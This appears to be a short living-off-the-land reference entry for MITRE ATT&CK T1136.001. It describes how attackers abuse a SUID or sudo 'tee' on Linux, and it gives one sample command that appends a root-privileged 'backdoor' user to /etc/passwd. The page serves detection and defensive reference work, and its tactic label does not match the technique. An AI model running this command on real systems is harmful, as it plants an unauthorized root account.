T1136.001Tactic: Execution & Defense EvasionOfficial MITRE ATT&CK Page

T1136.001: Technique T1136.001

Adversaries may leverage living-off-the-land techniques (T1136.001) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 1
Windows: 0
Linux: 1
macOS: 0

Living-off-the-Land Matrix for T1136.001

Across 1 verified binaries
Linux1 payloads

tee

Tee reads from standard input and writes to standard output and files. Attackers abuse SUID or sudo tee to append unauthorized credentials to /etc/passwd or overwrite system configuration.

Sample Attack Vector:
echo "backdoor:x:0:0::/root:/bin/bash" | tee -a /etc/passwd
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point